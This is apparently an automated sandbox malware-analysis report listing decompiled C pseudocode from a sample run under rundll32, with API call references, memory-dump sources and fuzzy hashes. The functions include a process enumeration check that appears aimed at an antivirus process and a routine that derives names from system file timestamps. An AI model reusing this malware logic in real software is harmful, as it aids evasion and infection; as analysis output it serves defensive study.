                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                  				if(_t17 != 0) {
                                                  					_t8 = Process32First(_t17,  &_v300);
                                                  					while(_t8 != 0) {
                                                  						_t9 =  *0x547d27c; // 0x1f6a5a8
                                                  						_t2 = _t9 + 0x547ee54; // 0x73617661
                                                  						_push( &_v264);
                                                  						if( *0x547d0fc() != 0) {
                                                  							_t15 = 1;
                                                  						} else {
                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						CloseHandle(_t17);
                                                  						goto L8;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L8:
                                                  				return _t15;
                                                  			}


                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0547758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 054775A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 054775CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 054775DD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 5badaaa88e25c5be01d2230f1b6959e968b1819c3f886f3fbf7ca5656e3916fb
                                                  • Instruction ID: 8e1999aad567eb9d13987f17bf8f5fac967a5e1cb4b3b69095b02e47a968231e
                                                  • Opcode Fuzzy Hash: 5badaaa88e25c5be01d2230f1b6959e968b1819c3f886f3fbf7ca5656e3916fb
                                                  • Instruction Fuzzy Hash: B2F0B47260512D6BDB20A7769C8DEFB3BADEFC5610F4040A3F916D2100EF24CD5A8AE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E05477C61(void* __esi) {
                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  
                                                  				_v4 = 0;
                                                  				memset(__esi, 0, 0x38);
                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                  				 *(__esi + 0x1c) = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                  					 *(__esi + 0x20) = _t10;
                                                  					if(_t10 == 0) {
                                                  						CloseHandle( *(__esi + 0x1c));
                                                  					} else {
                                                  						_v4 = 1;
                                                  					}
                                                  				}
                                                  				return _v4;
                                                  			}


                                                  APIs
                                                  • memset.NTDLL ref: 05477C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 05477C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 05477C91
                                                  • CloseHandle.KERNEL32(?), ref: 05477CA3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: b4da27aea7403e40b146d3fa30a5cdc6f39028290263085b42b1e98152163fea
                                                  • Instruction ID: fe6296e86b15f3193dbcfc91f3750a68257278de66a3a2598d81b395652e8def
                                                  • Opcode Fuzzy Hash: b4da27aea7403e40b146d3fa30a5cdc6f39028290263085b42b1e98152163fea
                                                  • Instruction Fuzzy Hash: A1F0F4B510430CBFD3205F66DCC5CB7BFACFB451D9B52456EF04691541DA32E8098AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0547970F() {
                                                  				void* _t1;
                                                  				intOrPtr _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t11;
                                                  
                                                  				_t1 =  *0x547d26c; // 0x31c
                                                  				if(_t1 == 0) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				SetEvent(_t1);
                                                  				_t11 = 0x7fffffff;
                                                  				while(1) {
                                                  					SleepEx(0x64, 1);
                                                  					_t5 =  *0x547d2b8; // 0x0
                                                  					if(_t5 == 0) {
                                                  						break;
                                                  					}
                                                  					_t11 = _t11 - 0x64;
                                                  					if(_t11 > 0) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t6 =  *0x547d26c; // 0x31c
                                                  				if(_t6 != 0) {
                                                  					CloseHandle(_t6);
                                                  				}
                                                  				_t7 =  *0x547d238; // 0x6ff0000
                                                  				if(_t7 != 0) {
                                                  					HeapDestroy(_t7);
                                                  				}
                                                  				goto L8;
                                                  			}


                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,05478099), ref: 0547971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 05479729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 0547974A
                                                  • HeapDestroy.KERNEL32(06FF0000), ref: 0547975A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 77795021a560ccd2124ab0fe2754366b0648642da34a8dad7aeede921114cb4e
                                                  • Instruction ID: ce02a87748452685a220cdd09953115e4773e46f9728ccd26608c16dfd4cf172
                                                  • Opcode Fuzzy Hash: 77795021a560ccd2124ab0fe2754366b0648642da34a8dad7aeede921114cb4e
                                                  • Instruction Fuzzy Hash: F2F03035B3935C9BD7286FB5A98EBC73FA8BF00651B040691B805E7380DF24D840DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E054775E9(void** __esi) {
                                                  				char* _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				void* _t8;
                                                  				intOrPtr _t11;
                                                  				void* _t12;
                                                  				void** _t14;
                                                  
                                                  				_t14 = __esi;
                                                  				_t4 =  *0x547d32c; // 0x73e95b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
                                                  					_t6 =  *0x547d32c; // 0x73e95b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t8 =  *_t14;
                                                  				if(_t8 != 0 && _t8 != 0x547d030) {
                                                  					HeapFree( *0x547d238, 0, _t8);
                                                  				}
                                                  				_t14[1] = E054794A9(_v0, _t14);
                                                  				_t11 =  *0x547d32c; // 0x73e95b0
                                                  				_t12 = _t11 + 0x40;
                                                  				__imp__(_t12);
                                                  				return _t12;
                                                  			}


                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 054775F2
                                                  • Sleep.KERNEL32(0000000A,?,054723DE), ref: 054775FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,054723DE), ref: 05477624
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 05477640
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: e7c7f0aee9f6e5e424ffae286dee2cfc18788087be46a2b61bfcbf572414f398
                                                  • Instruction ID: ee66098a3c4ea211bcd6fee571cbf2bbeebdb7c33c676f34f8db40e176500411
                                                  • Opcode Fuzzy Hash: e7c7f0aee9f6e5e424ffae286dee2cfc18788087be46a2b61bfcbf572414f398
                                                  • Instruction Fuzzy Hash: E3F0DA70A24289DBD7189FA9DA8AED67FE4EF14750B448406F906D7250DA30EC41CE69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E0547A5D6() {
                                                  				void* _v0;
                                                  				void** _t3;
                                                  				void** _t5;
                                                  				void** _t7;
                                                  				void** _t8;
                                                  				void* _t10;
                                                  
                                                  				_t3 =  *0x547d32c; // 0x73e95b0
                                                  				__imp__( &(_t3[0x10]));
                                                  				while(1) {
                                                  					_t5 =  *0x547d32c; // 0x73e95b0
                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t7 =  *0x547d32c; // 0x73e95b0
                                                  				_t10 =  *_t7;
                                                  				if(_t10 != 0 && _t10 != 0x547e836) {
                                                  					HeapFree( *0x547d238, 0, _t10);
                                                  					_t7 =  *0x547d32c; // 0x73e95b0
                                                  				}
                                                  				 *_t7 = _v0;
                                                  				_t8 =  &(_t7[0x10]);
                                                  				__imp__(_t8);
                                                  				return _t8;
                                                  			}


                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 0547A5DF
                                                  • Sleep.KERNEL32(0000000A,?,054723DE), ref: 0547A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,054723DE), ref: 0547A617
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 0547A62C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 56238412c9102371216585be7ba9d12d4d63322f71f5a5e30082ef3063db621a
                                                  • Instruction ID: bb33981ac6c7d630367ad8581177b91ba9c0dbcecc8fe08b9966011ef5c27d79
                                                  • Opcode Fuzzy Hash: 56238412c9102371216585be7ba9d12d4d63322f71f5a5e30082ef3063db621a
                                                  • Instruction Fuzzy Hash: 4BF06774A241489BE71C8F75D99AEDA7FE5EF08705B458056F906DB350CB30EC41CE15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E05477F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                  				intOrPtr* _v8;
                                                  				void* _t17;
                                                  				intOrPtr* _t22;
                                                  				void* _t27;
                                                  				char* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  				int _t42;
                                                  
                                                  				_t17 = __eax;
                                                  				_t37 = 0;
                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                  				_t2 = _t17 + 1; // 0x1
                                                  				_t28 = _t2;
                                                  				_t34 = E05472049(_t2);
                                                  				if(_t34 != 0) {
                                                  					_t30 = E05472049(_t28);
                                                  					if(_t30 == 0) {
                                                  						E05479039(_t34);
                                                  					} else {
                                                  						_t39 = _a4;
                                                  						_t22 = E0547A911(_t39);
                                                  						_v8 = _t22;
                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                  							_a4 = _t39;
                                                  						} else {
                                                  							_t26 = _t22 + 2;
                                                  							_a4 = _t22 + 2;
                                                  							_t22 = E0547A911(_t26);
                                                  							_v8 = _t22;
                                                  						}
                                                  						if(_t22 == 0) {
                                                  							__imp__(_t34, _a4);
                                                  							 *_t30 = 0x2f;
                                                  							 *((char*)(_t30 + 1)) = 0;
                                                  						} else {
                                                  							_t42 = _t22 - _a4;
                                                  							memcpy(_t34, _a4, _t42);
                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                  							__imp__(_t30, _v8);
                                                  						}
                                                  						 *_a8 = _t34;
                                                  						_t37 = 1;
                                                  						 *_a12 = _t30;
                                                  					}
                                                  				}
                                                  				return _t37;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,054715A4,?,?,?,?,00000102,054711DA,?,?,00000000), ref: 05477F33
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                    • Part of subcall function 0547A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,05477F61,00000000,00000001,00000001,?,?,054715A4,?,?,?,?,00000102), ref: 0547A91F
                                                    • Part of subcall function 0547A911: StrChrA.SHLWAPI(?,0000003F,?,?,054715A4,?,?,?,?,00000102,054711DA,?,?,00000000,00000000), ref: 0547A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,054715A4,?,?,?,?,00000102,054711DA,?), ref: 05477F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 05477FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 05477FAD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 9794872e83737d76ae4f538b34af73b92343d67dab2f8bacc0d91ce089bebf82
                                                  • Instruction ID: 9cc36831ca47b3f2b1a35abd3255edc3e84eef50aa0d035b3d63c578a7338bb4
                                                  • Opcode Fuzzy Hash: 9794872e83737d76ae4f538b34af73b92343d67dab2f8bacc0d91ce089bebf82
                                                  • Instruction Fuzzy Hash: 4021D57260825DEBCB129FA6D948AEF7FE9EF06240B45405AF9059B205D735CA0187E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E05477CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				void* _v8;
                                                  				void* _t18;
                                                  				int _t25;
                                                  				int _t29;
                                                  				int _t34;
                                                  
                                                  				_t29 = lstrlenW(_a4);
                                                  				_t25 = lstrlenW(_a8);
                                                  				_t18 = E05472049(_t25 + _t29 + _t25 + _t29 + 2);
                                                  				_v8 = _t18;
                                                  				if(_t18 != 0) {
                                                  					_t34 = _t29 + _t29;
                                                  					memcpy(_t18, _a4, _t34);
                                                  					_t10 = _t25 + 2; // 0x2
                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,073E937C,?,0547747C,004F0053,073E937C,?,?,?,?,?,?,05476814), ref: 05477CC8
                                                  • lstrlenW.KERNEL32(0547747C,?,0547747C,004F0053,073E937C,?,?,?,?,?,?,05476814), ref: 05477CCF
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0547747C,004F0053,073E937C,?,?,?,?,?,?,05476814), ref: 05477CEF
                                                  • memcpy.NTDLL(751469A0,0547747C,00000002,00000000,004F0053,751469A0,?,?,0547747C,004F0053,073E937C), ref: 05477D02
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: 9076c8e21bad375dd25293e339d4fa83593f2b0e4eec1d029cbe1c7a1af4eca2
                                                  • Instruction ID: 152b0fc2b8060474b4a6040e46ecbf2b339d16be2fc3b45b2ae699bc5027184e
                                                  • Opcode Fuzzy Hash: 9076c8e21bad375dd25293e339d4fa83593f2b0e4eec1d029cbe1c7a1af4eca2
                                                  • Instruction Fuzzy Hash: 42F03C7690011CBB8B11DFA9CC89CDE7BACEF092547014066A908DB211E631EA14CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(073E87FA,00000000,00000000,74ECC740,0547A453,00000000), ref: 05473CD8
                                                  • lstrlen.KERNEL32(?), ref: 05473CE0
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • lstrcpy.KERNEL32(00000000,073E87FA), ref: 05473CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 05473CFF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: cb1d7689b150f4635795db7361d334f398588241be8c6767844b24834cbfea2a
                                                  • Instruction ID: b3d61fe77ee88c684dba8bc25520bd4241ef95a52162535c38e6b2abb2a8e615
                                                  • Opcode Fuzzy Hash: cb1d7689b150f4635795db7361d334f398588241be8c6767844b24834cbfea2a
                                                  • Instruction Fuzzy Hash: 08E09273915268A787119FE5AC8CCEFBFADFF89611704481BF601E3110DB248D018BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E04F412D4(signed char* __eax, intOrPtr* _a4) {
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				CHAR* _v20;
                                                  				struct _FILETIME _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				char* _v40;
                                                  				signed int _v44;
                                                  				long _v344;
                                                  				struct _WIN32_FIND_DATAA _v368;
                                                  				signed int _t72;
                                                  				void* _t74;
                                                  				signed int _t76;
                                                  				void* _t78;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t83;
                                                  				void* _t85;
                                                  				signed char _t89;
                                                  				signed char _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t96;
                                                  				long _t99;
                                                  				int _t101;
                                                  				signed int _t109;
                                                  				char* _t111;
                                                  				void* _t113;
                                                  				int _t119;
                                                  				char _t128;
                                                  				void* _t134;
                                                  				signed int _t136;
                                                  				char* _t139;
                                                  				signed int _t140;
                                                  				char* _t141;
                                                  				char* _t146;
                                                  				signed char* _t148;
                                                  				int _t151;
                                                  				void* _t152;
                                                  				void* _t153;
                                                  				void* _t154;
                                                  				void* _t165;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t148 = __eax;
                                                  				_t72 =  *0x4f4d278; // 0x63699bc3
                                                  				_t74 = RtlAllocateHeap( *0x4f4d238, 0, _t72 ^ 0x63699ac7);
                                                  				_v20 = _t74;
                                                  				if(_t74 == 0) {
                                                  					L36:
                                                  					return _v12;
                                                  				}
                                                  				_t76 =  *0x4f4d278; // 0x63699bc3
                                                  				_t78 = RtlAllocateHeap( *0x4f4d238, 0, _t76 ^ 0x63699bce);
                                                  				_t146 = 0;
                                                  				_v36 = _t78;
                                                  				if(_t78 == 0) {
                                                  					L35:
                                                  					HeapFree( *0x4f4d238, _t146, _v20);
                                                  					goto L36;
                                                  				}
                                                  				_t136 =  *0x4f4d278; // 0x63699bc3
                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                  				_t81 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t154 = _t153 + 0xc;
                                                  				_t5 = _t81 + 0x4f4e7f2; // 0x73797325
                                                  				_t83 = E04F495B1(_t5);
                                                  				_v20 = _t83;
                                                  				if(_t83 == 0) {
                                                  					L34:
                                                  					HeapFree( *0x4f4d238, _t146, _v36);
                                                  					goto L35;
                                                  				}
                                                  				_t134 = 0xffffffffffffffff;
                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_v32 = _t85;
                                                  				if(_t85 != 0x63699bce) {
                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                  					FindCloseChangeNotification(_v32); // executed
                                                  				}
                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                  				 *_t148 = _t91;
                                                  				_v32 = _t91 & 0x000000ff;
                                                  				_t93 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t16 = _t93 + 0x4f4e813; // 0x642e2a5c
                                                  				_v40 = _t146;
                                                  				_v44 = _t89 & 0x000000ff;
                                                  				__imp__(_v20, _t16);
                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                  				_v16 = _t96;
                                                  				if(_t96 == _t134) {
                                                  					_t146 = 0;
                                                  					goto L34;
                                                  				}
                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				while(_t99 > 0) {
                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                  					if(_t101 == 0) {
                                                  						FindClose(_v16);
                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						_v28.dwHighDateTime = _v344;
                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                  					}
                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				}
                                                  				_v12 = _v12 & 0x00000000;
                                                  				while(1) {
                                                  					_t109 = _v44;
                                                  					if(_v12 <= _t109) {
                                                  						goto L15;
                                                  					}
                                                  					_t140 = _v12;
                                                  					if(_t140 > _v32) {
                                                  						_t141 = _v36;
                                                  						 *_a4 = _t141;
                                                  						while(1) {
                                                  							_t128 =  *_t141;
                                                  							if(_t128 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t128 < 0x30) {
                                                  								 *_t141 = _t128 + 0x20;
                                                  							}
                                                  							_t141 = _t141 + 1;
                                                  						}
                                                  						_v12 = 1;
                                                  						FindClose(_v16); // executed
                                                  						_t146 = 0;
                                                  						goto L35;
                                                  					}
                                                  					_t165 = _t140 - _t109;
                                                  					L15:
                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                  						_t139 = _v40;
                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                  						_t113 = 0;
                                                  						if(_t139 != 0) {
                                                  							_t48 = _t151 - 4; // -4
                                                  							_t113 = _t48;
                                                  							if(_t113 > _t151) {
                                                  								_t113 = 0;
                                                  							}
                                                  						}
                                                  						if(_t151 > 4) {
                                                  							_t151 = 4;
                                                  						}
                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                  						_t154 = _t154 + 0xc;
                                                  						_v40 =  &(_v40[_t151]);
                                                  					}
                                                  					do {
                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                  						if(_t119 == 0) {
                                                  							FindClose(_v16);
                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						}
                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                  					_v12 = _v12 + 1;
                                                  				}
                                                  			}

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04F412FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04F41321
                                                  • memset.NTDLL ref: 04F4133B
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04F423E9,63699BCE,04F41354,73797325), ref: 04F495C2
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F495DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F41379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F4138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04F413A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F413B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 04F413F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 04F41407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04F41425
                                                  • FindNextFileA.KERNELBASE(04F496C1,?), ref: 04F41439
                                                  • FindClose.KERNEL32(04F496C1), ref: 04F41446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04F41452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04F41474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 04F414A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 04F414E0
                                                  • FindNextFileA.KERNELBASE(04F496C1,?), ref: 04F414F5
                                                  • FindClose.KERNEL32(04F496C1), ref: 04F41502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04F4150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04F4151E
                                                  • FindClose.KERNELBASE(04F496C1), ref: 04F41553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04F41565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F41575
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: b30bdee82b7587c3eb0f97128fc7a69d50146f8f19e99282e1aa4427cc8ed681
                                                  • Instruction ID: 0bbd80e18adbaab93608a9e3209f5af8f99938bc833c9ebf987c31d410fbaf14
                                                  • Opcode Fuzzy Hash: b30bdee82b7587c3eb0f97128fc7a69d50146f8f19e99282e1aa4427cc8ed681
